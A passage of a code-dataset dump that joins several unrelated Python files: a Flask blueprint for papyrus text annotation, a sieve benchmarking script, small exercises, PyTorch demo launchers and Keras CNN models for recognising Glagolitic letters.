x[0]):\n full_str += u'{}\\n\\n'.format(_ref_bib(k, r))\n\n return full_str\n","sub_path":"basis_set_exchange/refconverters/bib.py","file_name":"bib.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"52185486","text":"\"\"\"Textpart blueprint\n\"\"\"\n\nimport json\n\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash, \\\n current_app as app\n\nfrom ..controllers import textpart as controller\nfrom ..controllers import document as document_controller\nfrom ..controllers import user\nfrom ..controllers import annotation\n\nfrom .user import admin_required\n\ntextpart = Blueprint('textpart', __name__, template_folder='../templates/textpart')\n\n@textpart.route('//')\ndef index(textpart_id, textpart_version_id):\n \"\"\"Textpart view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'textpart.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='view'\n ))\n\n@textpart.route('///annotate')\ndef annotate(textpart_id, textpart_version_id):\n \"\"\"Annotate view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n sematia_files = app.config['SEMATIA_FILES'][document['name']] \\\n if 'SEMATIA_FILES' in app.config \\\n and document['name'] in app.config['SEMATIA_FILES'] else ''\n\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n orig_annotations = annotation.get_annotations(textpart_version_id, 'o')\n reg_annotations = annotation.get_annotations(textpart_version_id, 'r')\n perseids_validated = user.perseids_validate()\n perseids_id = request.args.get('perseids_id', default='')\n perseids_pubid = request.args.get('perseids_pubid', default='')\n return(render_template(\n 'textpart/annotate.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n page='annotate',\n orig_annotations=orig_annotations,\n reg_annotations=reg_annotations,\n perseids_validated=perseids_validated,\n perseids_id=perseids_id,\n perseids_pubid=perseids_pubid,\n title=document['name'],\n sematia=sematia_files,\n ))\n\n@textpart.route('///versions')\ndef versions(textpart_id, textpart_version_id):\n \"\"\"Versions view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'textpart/versions.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='versions'\n ))\n\n\n\n@textpart.route('///edit')\n@admin_required\ndef edit(textpart_id, textpart_version_id):\n \"\"\"Edit view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n document_textparts = document_controller.get_textparts(document['id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'edit.html',\n textpart_version=textpart_version,\n document_textparts=document_textparts,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='edit'\n ))\n\n\n\n@textpart.route('///copy')\n@admin_required\ndef copy(textpart_id, textpart_version_id):\n \"\"\"Copy textpart version view\n \"\"\"\n new_id = controller.clone(textpart_version_id)\n if new_id:\n return redirect(url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=new_id\n ))\n return 'Something went wrong! Contact webmaster.'\n\n@textpart.route('///annotate/q', methods=['POST'])\n@admin_required\ndef annotate_ajax(textpart_id, textpart_version_id):\n \"\"\"Annotate POST\n \"\"\"\n data = request.json\n\n if data:\n if data['method'] == 'get_xml':\n return annotation.make_xml(textpart_version_id, data['layer'])\n if data['method'] == 'merge_alek':\n return annotation.merge_dukenlp(textpart_id, data['xml'], data['layer'])\n if data['method'] == 'merge_syntax':\n return annotation.merge_syntax(data['file'], data['xml'], data['layer'])\n if data['method'] == 'merge_sister':\n return annotation.merge_syntax(data['file'], data['xml'], data['layer'], sister=1)\n if data['method'] == 'get_alek':\n return json.dumps(annotation.get_dukenlp_comparison(\n textpart_id,\n textpart_version_id))\n if data['method'] == 'get_sematia':\n return json.dumps(annotation.get_sematia(\n textpart_id,\n textpart_version_id,\n data['layer']))\n if data['method'] == 'merge_sematia':\n return annotation.merge_sematia(textpart_id, textpart_version_id,\n data['layer'], data['data'], data['xml'])\n if data['method'] == 'export_to_arethusa':\n return annotation.export_to_arethusa(\n textpart_version_id, data['xml'],\n data['layer'],\n data['data_source']\n )\n\n@textpart.route('///edit/q', methods=['POST'])\n@admin_required\ndef save(textpart_id, textpart_version_id):\n \"\"\"Edit POST\n \"\"\"\n data = request.json\n result = False\n if data:\n result = controller.save_manual(data, textpart_version_id)\n if result:\n flash(u'Tokens saved!', 'success')\n\n else:\n flash(u'An error occurred. Get it fixed by contacting the developer.', 'danger')\n\n return url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=textpart_version_id\n )\n\n@textpart.route('///edit/import_next', methods=['POST'])\n@admin_required\ndef import_next(textpart_id, textpart_version_id):\n \"\"\"Import rest of sentence from next textpart POST\n \"\"\"\n\n result = controller.import_next(textpart_id, textpart_version_id)\n if result:\n flash(u'The rest of the sentence was imported successfully. Remember to delete the tokens from the following textpart', 'success')\n\n else:\n flash(u'An error occurred. Get it fixed by contacting the developer.', 'danger')\n\n return url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=textpart_version_id\n )\n\n@textpart.route('///annotate/upload', methods=['POST'])\n@admin_required\ndef upload(textpart_id, textpart_version_id):\n \"\"\"Upload POST\n \"\"\"\n if 'file' not in request.files:\n return json.dumps({'status': 'Error: No file'})\n file = request.files['file']\n layer = request.form['layer']\n\n if file:\n if file.filename == '':\n return 'Error: no file was uploaded'\n if '.' in file.filename and \\\n file.filename.rsplit('.', 1)[1].lower() in ['xml']:\n return json.dumps(annotation.get_syntax_comparison(\n file, textpart_id, textpart_version_id, layer))\n return 'Error: Only XML files allowed'\n\n return 'Error: unknown'\n","sub_path":"papygreek/blueprints/textpart.py","file_name":"textpart.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479509268","text":"#!/usr/bin/env python3\n__author__ = 'Dmitry V. Tishchenko'\nimport optparse\nimport argparse\nimport sys\nimport time\nimport subprocess\n\nmultprog = \"./sieve_multith\"\nuniprog = \"./sieve_unith\"\n\ndef perform_iters(progname, argsline, iterations):\n args = [progname,]\n args.extend(argsline)\n exectime = 0\n for i in range(iterations):\n start = time.time()\n subprocess.call(args)\n end = time.time()\n exectime += end - start\n exectime/= iterations\n return exectime\n\ndef findopt(iterations, outfile):\n #M; N; time M[1,20]\n outformat = \"{:d}; {:d}; {:.3f}\\n\"\n test_intervals = (1000000000, 100000000, 10000000, 1000000, 100000)\n\n with open(outfile, 'w') as out:\n for interval in test_intervals:\n result = perform_iters(uniprog, [str(interval),], iterations)\n out.write(str.format(outformat, 1, interval, result*1000))\n for threads_count in range(2,21):\n for interval in test_intervals:\n result = perform_iters(multprog, [str(interval), str(threads_count)], iterations)\n out.write(str.format(outformat, threads_count, interval, result*1000))\n\ndef compare(iterations, outfile):\n outformat = \"{:s}; {:d}; {:.3f}\\n\"\n with open(outfile, 'w') as out:\n for interval in range(1000000, 1000000001, 1000000):\n uniresult = perform_iters(uniprog, [str(interval),], iterations)\n out.write(str.format(outformat, \"UNI\", interval, uniresult*1000))\n multresult = perform_iters(multprog, [str(interval),\"1\"], iterations)\n out.write(str.format(outformat, \"MULT\", interval, multresult*1000))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(prog=\"experiments\")\n subparsers = parser.add_subparsers(help='subcommands:', dest=\"utility\")\n\n parser_findopt = subparsers.add_parser('findopt', help='find optimal threads count for this machine')\n parser_findopt.add_argument(\"--out\", dest=\"outfile\", help=\"output filename\")\n parser_findopt.add_argument('-i', type=int, default=3, dest=\"iterations\", help='iterations for experiment measurement')\n\n parser_report1 = subparsers.add_parser('compare', help='compares unithreaded and multithreaded programs')\n parser_report1.add_argument(\"--out\", dest=\"outfile\", help=\"output filename\")\n parser_report1.add_argument('-i', type=int, default=3, dest=\"iterations\", help='iterations for experiment measurement')\n\n args = parser.parse_args()\n if args.utility == \"findopt\":\n findopt(args.iterations,args.outfile)\n elif args.utility == \"compare\":\n compare(args.iterations,args.outfile)\n\n\n\n","sub_path":"labs/504/tishchenko.dmitry/06_sieve/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"289240918","text":"'''按顺序计算5的数量\nnums = [5,5,10,10,20]\ncount = 0\nmoney = 0\nfor num in nums:\n #找得起\n money += 5\n if num > money + 5:\n print('no')\n break\n else:\n #找得开:有5\n \n print('yes') '''\n\n#可从局部最优解推算出全局最优解,故贪心算法\nnums = [20,5,10,20,20]\nfive = ten = 0\nfor num in nums:\n if num == 5:\n five += 1\n elif num == 10:\n ten += 1\n five -= 1\n else:\n if ten > 0:\n ten -= 1\n five -= 1\n else:\n five -= 3\n if five < 0:\n print('no')\n break\n else:\n print('yes')\n","sub_path":"Week_03/柠檬水找0.py","file_name":"柠檬水找0.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"337498902","text":"import cv2 \nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('8_bit.png',0)\nprint(img.shape)\ncv2.imshow(\"image\",img)\ncv2.waitKey(0) \ncv2.destroyAllWindows()\nplt.hist(img.ravel(),256,[0,256]); plt.show()\nlist_img = []\nfor row,index in enumerate(img):\n # print(row)\n list_img = np.concatenate((list_img,index))\nprint(len(list_img))\ncolor = ('b')\nfor i,col in enumerate(color):\n histr = cv2.calcHist([img],[i],None,[256],[0,256])\n plt.plot(histr,color = col)\n plt.xlim([0,256])\nplt.show()\n","sub_path":"histograam.py","file_name":"histograam.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"513411176","text":"# encoding=utf-8\n\nimport argparse\nfrom pytorch_demos.demo1.main import main as pt_m1\nfrom pytorch_demos.demo2.entry import main as pt_m2\nfrom pytorch_demos.demo3.entry import main as pt_m3\nfrom pytorch_demos.demo4.entry import main as pt_m4\nfrom pytorch_demos.demo5.entry import main as pt_m5\nfrom pytorch_demos.demo6.entry import main as pt_m6\nfrom pytorch_demos.demo7.entry import main as pt_m7\nfrom pytorch_demos.demo8.entry import main as pt_m8\nfrom pytorch_demos.demo9.entry import main as pt_m9\nfrom pytorch_demos.demo10.entry import main as pt_m10\nfrom datetime import datetime\n\ntasks = {\n 'Pytorch Mnist': pt_m1,\n 'Dcgan': pt_m2,\n 'Vae': pt_m3,\n 'Mnist hogwild': pt_m4,\n 'Regression': pt_m5,\n 'LSTM wave': pt_m6,\n 'STM Name classify': pt_m7,\n 'LSTM Name generating': pt_m8,\n 'Word languagle model': pt_m9,\n 'My CNN': pt_m10\n}\n\n\ndef launch(func_name, dataset, epoch):\n func = tasks[func_name]\n start = datetime.now()\n print('{:-^60s}'.format(func_name))\n print('%s starts executing at %s' % (func_name.ljust(20), start.strftime('%Y/%m/%d, %H:%M:%S')))\n func(dataset, epoch)\n elapsed = datetime.now() - start\n print('%s finished, Elapsed time:%.4f s' % (func_name.ljust(20), elapsed.seconds))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-a', '--all', help='run all demos', action='store_true')\n parser.add_argument('-n', '--name', help='the name of the task you want to run', type=str, default='Pytorch Mnist')\n parser.add_argument('-e', '--epoch', help='set num of epochs', type=int, default=10)\n parser.add_argument('data', type=str, help='path to data set')\n options = parser.parse_args()\n print(options)\n if options.all:\n print('Run all demos')\n for task in tasks:\n launch(task, options.data, options.epoch)\n else:\n print('Run %s' % options.name)\n launch(options.name, options.data, options.epoch)\n","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"291742849","text":"\n\nfrom __future__ import print_function\nimport os\nimport sys\nif __name__ == \"__main__\":\n# os.chdir('E:\\\\TunnelHough')\n \n ins = open( \"car.lst\", \"r\" )\n array = []\n for line in ins:\n array.append( line.strip() )\n \n fls=array[1:int(array[0])+1]\n features=[]\n positions=[]\n for fl in fls: \n temfile=open(fl+'_surf.txt','r')\n num=int(temfile.readline().strip())\n for i in range(0, num):\n positions.append(temfile.readline().strip())\n features.append(temfile.readline().strip())\n \n temfile.close() \n \n allf=open('allFeatures.txt','wb')\n for fea in features:\n print(fea,file=allf)\n \n allf.close()\n ","sub_path":"collectFeaFrmLst.py","file_name":"collectFeaFrmLst.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455966419","text":"import math\n\ndef dist(x1,y1,x2,y2):\n return math.sqrt( ((x1-x2)**2) + ((y1-y2)**2))\n\ndef add_testcylinder():\n r = \"\"\n\n #focus 1\n f1x = 250\n f1y = 150\n\n #focus 2\n f2x = 250\n f2y = 350\n\n z1 = 100 #face1\n z2 = 300 #face2\n\n edge = []\n d = 400 #total dist from focii\n\n face1a = []\n face2a = []\n face1b = []\n face2b = []\n #i_cant_do_math.jpg\n #brute_force.png\n for y in range(100):\n y = y*5\n for x in range(500):\n f1d = dist(x,y,f1x,f1y)\n f2d = dist(x,y,f2x,f2y)\n curd = f1d + f2d\n if abs(curd-d)<1:\n face1a+=[ [x,y,z1] ]\n face2a+=[ [x,y,z2] ]\n break\n for x in range(500):\n x = 500-x\n f1d = dist(x,y,f1x,f1y)\n f2d = dist(x,y,f2x,f2y)\n curd = f1d + f2d\n if abs(curd-d)<1:\n face1b+=[ [x,y,z1] ]\n face2b+=[ [x,y,z2] ]\n break\n\n face1b.reverse()\n face2b.reverse()\n face1 = face1a + face1b\n face2 = face2a + face2b\n\n for i in range(len(face1)):\n f1 = face1[i]\n f2 = face2[i]\n if i+1 0):\n plot_counter = int(names[-1])+1\n\n plotfile = data_dir+\"/{:03d}{:s}\".format(plot_counter,ext) \n print(\"saving to \"+plotfile)\n picklefile = plotfile.replace(ext,\".pickle\")\n print(\"saving to \"+picklefile)\n\n import pickle\n fig = plt.gcf()\n pickle.dump(fig,open(picklefile,'wb'))\n \n plt.savefig(plotfile)\n\n plt.show()\n\ndef pickle_this(this,name):\n import pickle\n picklefile = make_data_dir()+\"/{:s}.pickle\".format(name)\n print(\"saving to \"+picklefile)\n pickle.dump(this,open(picklefile,'wb'))\n \ndef unpickle(name):\n import pickle\n picklefile = \"{:s}\".format(name)\n print(\"loading from \"+picklefile)\n return pickle.load(open(picklefile,\"rb\"))\n\ndef load_plot_pickle(file):\n from matplotlib import pyplot as plt\n import pickle\n pickle.load(open(file,\"rb\"))\n\n\n","sub_path":"workdir/python_modules/my_utils.py","file_name":"my_utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445314249","text":"from __future__ import print_function\nimport os\n#da odaberem graficku karticu\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nimport shutil\n\n#importanje Kerasa i slojeva za arhitekturu1\nimport tensorflow\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, BatchNormalization\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\n#importanje slojeva za VGG16\nfrom tensorflow.keras.layers import Convolution2D, ZeroPadding2D\n#optimizer za VGG16 model\nfrom tensorflow.keras.optimizers import SGD\n\n#importanje alata za augumentaciju podataka\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n#importanje dodatnih metrika iz Kerasa\nfrom tensorflow.keras import metrics\n\n#importanje numpya\nimport numpy as np\n#importanje matplotliba za grafove\nimport matplotlib.pyplot as plt\n\nfrom sklearn.utils import shuffle\nimport shutil\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nfrom sklearn.metrics import accuracy_score\nfrom tensorflow.keras.models import model_from_json\nfrom PIL import Image\n\n#sprema graf za usporedbu dviju funkcija\ndef save_graph(x, y1, y2, x_label, y_label, y1_label, y2_label, plot_title, dst):\n\tfig = plt.figure()\n\tax = plt.subplot(111)\n\tline1 = plt.plot(x, y1, 'b', label=y1_label)\n\tplt.setp(line1, color='r', linewidth=1.0)\n\tline2 = plt.plot(x, y2, 'b', label=y2_label)\n\tplt.setp(line2, color='g', linewidth=1.0)\n\tplt.title(plot_title)\n\tplt.ylabel(y_label)\n\tplt.xlabel(x_label)\n\tplt.legend([y1_label, y2_label], loc='upper left')\n\t#plt.grid(True)\n\tfig.savefig(dst)\n\n#funkcija koja vraca VGG16 model\ndef VGG_16(weights_path=None):\n\tmodel = Sequential()\n\tmodel.add(ZeroPadding2D((1,1),input_shape=input_shape))\n\tmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(128, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(128, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(4096, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(4096, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tif weights_path:\n\t\tmodel.load_weights(weights_path)\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy'])\n\treturn model\n\n#funkcija koja vraca LeNet model\ndef lenet():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, kernel_size=(3, 3),\n\t\t\t\t\t activation='relu',\n\t\t\t\t\t input_shape=input_shape))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.25))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca prvi model za kineski jezik\n#neke linije su komentirane jer se pokazalo da je originalni model predubok za glagoljicu\t\ndef kineski1():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(96, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(160, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(192, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\t\"\"\"\n\tmodel.add(Conv2D(224, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(256, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Conv2D(288, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(320, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Conv2D(352, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(384, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\t\"\"\"\n\tmodel.add(Flatten())\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca drugi model za kineski jezik\n#neke linije su komentirane jer se pokazalo da je originalni model predubok za glagoljicu\t\ndef kineski2():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(96, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(160, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\t\"\"\"\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(192, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\t\"\"\"\n\tmodel.add(Flatten())\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca model za arapski jezik\ndef arapski():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(72, kernel_size=(6, 6), strides=1, activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Conv2D(144, (5, 5), strides=2, activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Conv2D(192, (4, 4), strides=2, activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(400, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\t\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) \n\treturn model\n\n#funkcija koja trenira model na odredjenom datasetu te sprema rezultat\ndef treniraj(model, foldername, modelname, data_number, dataset, epochs, batch_size, steps_per_epoch, validation_steps):\n\tname = foldername + '/' + modelname + '/' + modelname + '-data'+ str(data_number)\n\ttrain_datagen = ImageDataGenerator(\n\t\t\trescale=1./255,\n\t\t\tshear_range=0.2,\n\t\t\tzoom_range=0.2,\n\t\t\thorizontal_flip=False)\n\n\tval_datagen = ImageDataGenerator(rescale=1./255)\n\n\ttrain_generator = train_datagen.flow_from_directory(\n\t\tdataset + '/train',\n\t\ttarget_size=(img_rows, img_cols),\n\t\tcolor_mode='grayscale',\n\t\tbatch_size=batch_size,\n\t\tclass_mode='categorical',\n\t\tshuffle='True')\n\n\tvalidation_generator = val_datagen.flow_from_directory(\n\t\tdataset + '/validation',\n\t\ttarget_size=(img_rows, img_cols),\n\t\tcolor_mode='grayscale',\n\t\tbatch_size=batch_size,\n\t\tclass_mode='categorical',\n\t\tshuffle='True')\n\t'''\n\tes = tensorflow.keras.callbacks.EarlyStopping(\n\t\tmonitor='val_loss',\n\t\tmin_delta=0,\n\t\tpatience=2,\n\t\tverbose=0, \n\t\tmode='auto')\n\t'''\n\t\n\tcheckpoint = tensorflow.keras.callbacks.ModelCheckpoint(\n\t\tname + '.h5', \n\t\tmonitor='val_loss', \n\t\tverbose=0, \n\t\tsave_best_only=True, \n\t\tmode='auto')\n\t\n\thistory = model.fit_generator(\n\t\ttrain_generator,\n\t\tsteps_per_epoch=steps_per_epoch,\n\t\tepochs=epochs,\n\t\tverbose=1,\n\t\tvalidation_data=validation_generator,\n\t\tvalidation_steps=validation_steps,\n\t\tcallbacks = [checkpoint])\n\t\n\t'''\n\t#spremanje modela\n\tmodel_json = model.to_json()\n\twith open(name + \".json\", \"w\") as json_file:\n\t\tjson_file.write(model_json)\n\t#spremanje tezina\n\tmodel.save_weights(name + \".h5\")\n\t'''\n\n\tnum_epochs = [i for i in range(1, len(history.history['acc']) + 1)]\n\tsave_graph(num_epochs, history.history['acc'], history.history['val_acc'], 'Epohe', 'Točnost', 'Točnost treniranja', 'Točnost validacije', 'Graf točnosti', 'Rezultati/' + modelname + '/' + 'plot-' + modelname + '-data'+ str(data_number) + '-acc.png')\n\tsave_graph(num_epochs, history.history['loss'], history.history['val_loss'], 'Epohe', 'Gubitak', 'Gubitak treniranja', 'Gubitak validacije', 'Graf gubitka', 'Rezultati/' + modelname + '/' + 'plot-' + modelname + '-data'+ str(data_number) + '-loss.png')\n'''\n#funkcija koja prikazuje matricu zabune\ndef cm_saving(cm, classes, dst, normalize='False', title='Matrica zabune'):\n\tif normalize:\n\t\tcm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n\tfig = plt.figure()\n\tplt.clf()\n\tax = fig.add_subplot(111)\n\tax.set_aspect(1)\n\tres = ax.imshow(np.array(cm), cmap=plt.cm.jet, \n\t\t\t\t\tinterpolation='nearest')\n\tplt.title(title)\n\n\twidth = len(classes)\n\theight = len(classes)\n\n\tcb = fig.colorbar(res)\n\talphabet = classes\n\tplt.xticks(range(width), alphabet[:width], rotation=90)\n\tplt.yticks(range(height), alphabet[:height])\n\tplt.tight_layout(pad=1.5)\n\tplt.ylabel(\"Prava klasa\")\n\tplt.xlabel(\"Predviđena klasa\")\n\tplt.savefig(dst, format='png')\n\t#plt.show()\n\ndef validiraj(model, val):\t\n\tazbuka = ['a', 'b', 'v', 'g', 'd', 'e', 'zj', 'dz', 'z', '(i)', 'i', 'dj', 'k', 'l', 'm', 'n', 'o', 'p', 'r', 's', 't', 'u', 'f', 'h', '(o)', \"(sj)c'\", 'c', 'cj', 'sj', 'ja, (i)je', 'ju' ,'j', 'poluglas']\n\tazbuka.sort()\n\n\t#ucitavanje modela\n\tjson_file = open(model + '.json', 'r')\n\tloaded_model_json = json_file.read()\n\tjson_file.close()\n\tloaded_model = model_from_json(loaded_model_json)\n\t#ucitavanje tezina\n\tloaded_model.load_weights(model + '.h5')\n\tprint(\"Loaded model from disk\")\n\n\timg_rows, img_cols = 50, 50\n\tnum_classes = 33\n\n\ttest_labels = []\n\trounded_predictions = []\n\t\n\ttocno = 0\n\tkrivo = 0\n\tfor slovo in azbuka:\n\t\tX = []\n\n\t\tpath = val + \"/\" + slovo + '/'\n\t\timlist = os.listdir(path)\n\n\t\timarray = [np.array(Image.open(path + im)).flatten() for im in imlist]\n\n\t\tX += imarray\n\n\t\tX = np.array(X)\n\n\t\ttrain_samples = len(X)\n\n\t\tif K.image_data_format() == 